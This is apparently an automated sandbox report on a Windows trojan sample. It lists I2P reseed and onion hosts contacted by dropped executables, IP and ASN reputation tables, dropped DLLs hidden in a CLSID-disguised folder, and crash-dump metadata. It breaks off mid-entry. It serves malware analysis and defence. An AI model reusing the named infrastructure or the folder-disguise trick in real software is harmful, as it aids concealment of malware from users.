NameIPActiveMaliciousAntivirus DetectionReputation
banana.incognet.io
23.137.250.108
truetrue
    unknown
    reseed.diva.exchange
    80.74.145.70
    truetrue
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://reseed.diva.exchange/b.cmain.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        https://i2pseed.creativecowpat.net:8443/main.exe, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954930725.00000142D8D50000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drtrue
          unknown
          https://i2p.novg.net/Kmain.exe, 00000017.00000002.2668148330.00000157C5E68000.00000004.00000020.00020000.00000000.sdmpfalse
            unknown
            http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3main.exe, 00000020.00000003.2796330606.00000142D8DAB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2796297665.00000142D8DD6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2796330606.00000142D8DA2000.00000004.00000020.00020000.00000000.sdmptrue
              unknown
              https://reseed.memcpy.io/main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drtrue
                unknown
                https://reseed.i2pgit.org/main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drtrue
                  unknown
                  https://reseed-fr.i2pd.xyz/Imain.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://reseed-pl.i2pd.xyz/main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drtrue
                      unknown
                      http://stats.i2p/cgi-bin/newhosts.txt73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drfalse
                        unknown
                        http://127.0.0.1:811873tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000003.2278107155.00000157C5E73000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2278195165.00000157C5E78000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drfalse
                          unknown
                          https://banana.incognet.io:443/i2pseeds.su3Wmain.exe, 00000017.00000003.2291390149.00000157C6272000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://reseed.onion.im/main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drtrue
                              unknown
                              https://banana.incognet.io/Wmain.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://i2p.mooo.com/netDb/73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drfalse
                                  unknown
                                  https://reseed2.i2p.net/main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drtrue
                                    unknown
                                    http://reg.i2p/hosts.txty-main.exe, 00000020.00000002.2954930725.00000142D8DA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://banana.incognet.io/main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drtrue
                                        unknown
                                        http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtmain.exe, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr, 6rRRlGVV.23.drfalse
                                          unknown
                                          https://www2.mk16.de/mmain.exe, 00000017.00000002.2668148330.00000157C5E68000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://reseed-fr.i2pd.xyz/main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drtrue
                                              unknown
                                              https://reseed.i2pgit.org/Lmain.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://reseed.onion.im/Omain.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmptrue
                                                  unknown
                                                  https://reseed.i2p-projekt.de/73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drfalse
                                                    unknown
                                                    https://i2p.novg.net/main.exe, 00000020.00000002.2954829051.00000142D899E000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drtrue
                                                      unknown
                                                      https://reseed-pl.i2pd.xyz/3main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3/)main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://netdb.i2p2.no/73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drfalse
                                                            unknown
                                                            https://i2p.ghativega.in/main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drtrue
                                                              unknown
                                                              https://reseed.i2pgit.org/6main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                http://upx.sf.netAmcache.hve.31.drfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://www2.mk16.de/73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2668148330.00000157C5E68000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2669826636.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D899E000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drtrue
                                                                    unknown
                                                                    http://reg.i2p/hosts.txtmain.exe, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954930725.00000142D8DA8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr, 6rRRlGVV.23.drfalse
                                                                      unknown
                                                                      https://reseed.stormycloud.org/HWUm~GTamain.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://banana.incognet.io/i2pseeds.su3main.exe, 00000017.00000002.2668284810.00000157C6271000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2292775303.00000157C6272000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2291390149.00000157C6272000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://reseed-pl.i2pd.xyz/Fmain.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://reseed.memcpy.io/%main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://reseed.onion.im/wmain.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                unknown
                                                                                http://identiguy.i2p/hosts.txt73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drfalse
                                                                                  unknown
                                                                                  http://reg.i2p/hosts.txtf?main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://reg.i2p/hosts.txteimain.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://reseed.diva.exchange/main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drtrue
                                                                                        unknown
                                                                                        https://reseed2.i2p.net/vp/p_lib.cmain.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://legit-website.com/i2pseeds.su373tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drfalse
                                                                                            unknown
                                                                                            http://reg.i2p/hosts.txt?~main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://i2pd.readthedocs.io/en/latest/user-guide/configuration/73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drfalse
                                                                                                unknown
                                                                                                https://banana.incognet.io:443/i2pseeds.su3main.exe, 00000017.00000003.2291390149.00000157C6272000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2782368111.00000142D89FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://reseed.stormycloud.org/main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D899E000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.drtrue
                                                                                                    unknown
                                                                                                    http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://rus.i2p/hosts.txt73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.drfalse
                                                                                                        unknown
                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs
                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        80.74.145.70
                                                                                                        reseed.diva.exchangeSwitzerland
                                                                                                        21069ASN-METANETRoutingpeeringissuesnocmetanetchCHtrue
                                                                                                        2.178.241.192
                                                                                                        unknownIran (ISLAMIC Republic Of)
                                                                                                        12880DCI-ASIRfalse
                                                                                                        45.126.126.80
                                                                                                        unknownAustralia
                                                                                                        64022KAMATERAINC-AS-APKamateraIncHKfalse
                                                                                                        146.70.24.213
                                                                                                        unknownUnited Kingdom
                                                                                                        2018TENET-1ZAfalse
                                                                                                        85.236.190.252
                                                                                                        unknownRussian Federation
                                                                                                        35032TAHIONISP-ASRUfalse
                                                                                                        23.137.249.66
                                                                                                        unknownReserved
                                                                                                        397614GTLAKESUSfalse
                                                                                                        95.68.156.35
                                                                                                        unknownRussian Federation
                                                                                                        12389ROSTELECOM-ASRUfalse
                                                                                                        89.87.222.219
                                                                                                        unknownFrance
                                                                                                        5410BOUYGTEL-ISPFRfalse
                                                                                                        23.137.250.108
                                                                                                        banana.incognet.ioReserved
                                                                                                        397614GTLAKESUStrue
                                                                                                        91.149.236.241
                                                                                                        unknownPoland
                                                                                                        41952MARTON-ASPLfalse
                                                                                                        2.191.228.230
                                                                                                        unknownIran (ISLAMIC Republic Of)
                                                                                                        12880DCI-ASIRfalse
                                                                                                        62.210.85.80
                                                                                                        unknownFrance
                                                                                                        12876OnlineSASFRfalse
                                                                                                        124.169.148.215
                                                                                                        unknownAustralia
                                                                                                        7545TPG-INTERNET-APTPGTelecomLimitedAUfalse
                                                                                                        151.242.80.51
                                                                                                        unknownIran (ISLAMIC Republic Of)
                                                                                                        31549RASANAIRfalse
                                                                                                        82.38.134.93
                                                                                                        unknownUnited Kingdom
                                                                                                        5089NTLGBfalse
                                                                                                        217.255.81.237
                                                                                                        unknownGermany
                                                                                                        3320DTAGInternetserviceprovideroperationsDEtrue
                                                                                                        173.68.123.78
                                                                                                        unknownUnited States
                                                                                                        701UUNETUStrue
                                                                                                        83.255.145.146
                                                                                                        unknownSweden
                                                                                                        39651COMHEM-SWEDENSEfalse
                                                                                                        45.30.192.252
                                                                                                        unknownUnited States
                                                                                                        7018ATT-INTERNET4USfalse
                                                                                                        173.47.97.119
                                                                                                        unknownUnited States
                                                                                                        26788ROGERS-COMMUNICATIONSCAfalse
                                                                                                        23.128.248.23
                                                                                                        unknownReserved
                                                                                                        397120CHEMUNGCONYUStrue
                                                                                                        77.54.240.255
                                                                                                        unknownPortugal
                                                                                                        12353VODAFONE-PTVodafonePortugalPTtrue
                                                                                                        87.225.96.167
                                                                                                        unknownRussian Federation
                                                                                                        12389ROSTELECOM-ASRUfalse
                                                                                                        80.46.94.241
                                                                                                        unknownUnited Kingdom
                                                                                                        9105TISCALI-UKTalkTalkCommunicationsLimitedGBfalse
                                                                                                        50.100.197.208
                                                                                                        unknownCanada
                                                                                                        603BACOM2-ASCAfalse
                                                                                                        99.174.64.226
                                                                                                        unknownUnited States
                                                                                                        7018ATT-INTERNET4USfalse
                                                                                                        IP
                                                                                                        127.0.0.1
                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1531723
                                                                                                        Start date and time:2024-10-11 16:52:10 +02:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 9m 22s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:33
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:file.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.evad.winEXE@45/68@2/27
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 66.7%
                                                                                                        HCA Information:Failed
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                        • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Execution Graph export aborted for target 73tsjpnle0jv48sgryqfs6ph8t.exe, PID 6248 because it is empty
                                                                                                        • Execution Graph export aborted for target file.exe, PID 7096 because there are no executed function
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                                        • VT rate limit hit for: file.exe
                                                                                                        TimeTypeDescription
                                                                                                        10:53:08API Interceptor298x Sleep call for process: file.exe modified
                                                                                                        10:53:09API Interceptor39x Sleep call for process: powershell.exe modified
                                                                                                        10:54:35API Interceptor40x Sleep call for process: main.exe modified
                                                                                                        10:54:40API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                        No context
                                                                                                        No context
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        ASN-METANETRoutingpeeringissuesnocmetanetchCHna.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 94.126.19.25
                                                                                                        http://radio-en-ligne.frGet hashmaliciousUnknownBrowse
                                                                                                        • 94.126.16.223
                                                                                                        http://tradingbotsreviews.comGet hashmaliciousUnknownBrowse
                                                                                                        • 94.126.16.223
                                                                                                        gUJak0onLk.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 80.74.142.135
                                                                                                        0SpHek7Jd8.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 80.74.153.240
                                                                                                        https://get-verified-badge-now-free.netlify.app/Get hashmaliciousUnknownBrowse
                                                                                                        • 94.126.16.223
                                                                                                        https://swans-muffin-1id4964-7304421.netlify.app/formGet hashmaliciousUnknownBrowse
                                                                                                        • 94.126.16.223
                                                                                                        https://reg1a-g4ad23-269fe50-lqng5s.netlify.app/dev.html/Get hashmaliciousUnknownBrowse
                                                                                                        • 94.126.16.223
                                                                                                        https://rainbow-yeot-24cb81.netlify.app/appeal.html/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 94.126.16.223
                                                                                                        https://profound-maamoul-a6d671.netlify.app/appeal.html/Get hashmaliciousUnknownBrowse
                                                                                                        • 94.126.16.223
                                                                                                        DCI-ASIRIpYWCeJMsb.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                        • 93.118.137.82
                                                                                                        0NSjUT34gS.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                                                                        • 2.177.243.253
                                                                                                        SL71PJLYwl.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 217.218.139.62
                                                                                                        pur361ECCi.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 89.219.67.124
                                                                                                        na.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 2.179.9.9
                                                                                                        wu5C20dPdy.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                        • 93.118.137.82
                                                                                                        z3hir.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 5.74.168.46
                                                                                                        bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                                                                                                        • 2.177.243.253
                                                                                                        file.exeGet hashmaliciousPhorpiexBrowse
                                                                                                        • 2.190.65.74
                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 2.177.52.177
                                                                                                        TENET-1ZAbIb2gpepKH.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 143.136.183.112
                                                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 146.69.137.37
                                                                                                        C0B9Ema9el.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 146.70.57.58
                                                                                                        TLdhryJV0V.exeGet hashmaliciousRemcosBrowse
                                                                                                        • 146.70.57.58
                                                                                                        na.elfGet hashmaliciousUnknownBrowse
                                                                                                        • 146.141.199.26
                                                                                                        XvAqhy3FO6.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                        • 143.136.135.240
                                                                                                        x86.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 152.106.28.88
                                                                                                        81zBpBAWwc.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                        • 146.70.224.90
                                                                                                        novo.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                        • 143.128.55.96
                                                                                                        yakov.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                        • 154.115.52.8
                                                                                                        KAMATERAINC-AS-APKamateraIncHKnamedsGet hashmaliciousXmrigBrowse
                                                                                                        • 103.195.7.168
                                                                                                        https://amreican-express.ckawd.top/jpGet hashmaliciousUnknownBrowse
                                                                                                        • 45.126.125.170
                                                                                                        SecuriteInfo.com.Exploit.Siggen3.32706.7006.xlsGet hashmaliciousHidden Macro 4.0, EmotetBrowse
                                                                                                        • 103.195.4.8
                                                                                                        SecuriteInfo.com.Exploit.Siggen3.32706.16507.xlsGet hashmaliciousHidden Macro 4.0, EmotetBrowse
                                                                                                        • 103.195.4.8
                                                                                                        SecuriteInfo.com.Exploit.Siggen3.32706.9748.xlsGet hashmaliciousHidden Macro 4.0, EmotetBrowse
                                                                                                        • 103.195.4.8
                                                                                                        Scan 2022.20.05_0910.xlsGet hashmaliciousHidden Macro 4.0, EmotetBrowse
                                                                                                        • 103.195.4.8
                                                                                                        4921176754627453124.xlsGet hashmaliciousHidden Macro 4.0Browse
                                                                                                        • 103.195.4.8
                                                                                                        Univ-pau_form.xlsGet hashmaliciousHidden Macro 4.0Browse
                                                                                                        • 103.195.4.8
                                                                                                        10082376542717622006.xlsGet hashmaliciousHidden Macro 4.0Browse
                                                                                                        • 103.195.4.8
                                                                                                        6691113204648532361.xlsGet hashmaliciousHidden Macro 4.0, EmotetBrowse
                                                                                                        • 103.195.4.8
                                                                                                        No context
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dllfile.exeGet hashmaliciousUnknownBrowse
                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                            C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dllfile.exeGet hashmaliciousUnknownBrowse
                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):65536
                                                                                                                Entropy (8bit):0.9805730517966776
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:V4wFgDac6OsehMX7q9fwQXIDcQic6EcERcw3W3d+HbHg/opAnQzOqg7ThVMkQBr6:Pa2c6O/d0MALS36jV7EzuiFXZ24lO8l
                                                                                                                MD5:BF30ED6D98526E033653DAA37E8B2BBC
                                                                                                                SHA1:30CB07EAE72BF1B4A12AA4657E0A1D2524F48035
                                                                                                                SHA-256:656CE38AA916CC503773E87FF22DFA565D6A0058323AFA7A9DE92F4E55445CA5
                                                                                                                SHA-512:8E5EA50AC5A800748B20E11713BF1F3D73C78C2E0BE49B95B8707C68D5B1FD6B8F143347964A2CF8AAC2F6A5BA63A33A2C8CAFDD308B9A0DA780D71725286B63
                                                                                                                Malicious:true
                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.1.3.2.0.7.1.9.4.1.4.7.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.1.3.2.0.7.2.4.7.2.7.1.7.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.1.d.6.b.4.d.-.0.5.a.1.-.4.3.8.2.-.b.a.b.e.-.9.0.f.a.5.5.8.e.a.3.9.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.b.f.9.7.d.8.-.a.5.8.8.-.4.a.4.a.-.8.6.a.0.-.c.d.b.d.d.a.7.3.5.4.a.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.a.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.6.0.-.0.0.0.0.-.0.0.1.4.-.d.b.5.6.-.d.b.6.7.e.d.1.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.1.8.d.4.3.1.0.6.5.7.e.8.3.6.8.5.5.7.f.1.8.3.e.1.5.c.4.7.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.a.c.f.e.6.3.9.7.d.f.f.c.6.1.d.2.4.3.2.0.6.8.8.5.c.3.8.9.e.a.0.5.4.2.8.7.5.5.!.m.a.i.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.:.0.0.!.1.d.
                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                File Type:Mini DuMP crash report, 15 streams, Fri Oct 11 14:54:32 2024, 0x1205a4 type
                                                                                                                Category:dropped
                                                                                                                Size (bytes):628936
                                                                                                                Entropy (8bit):1.01212478603393
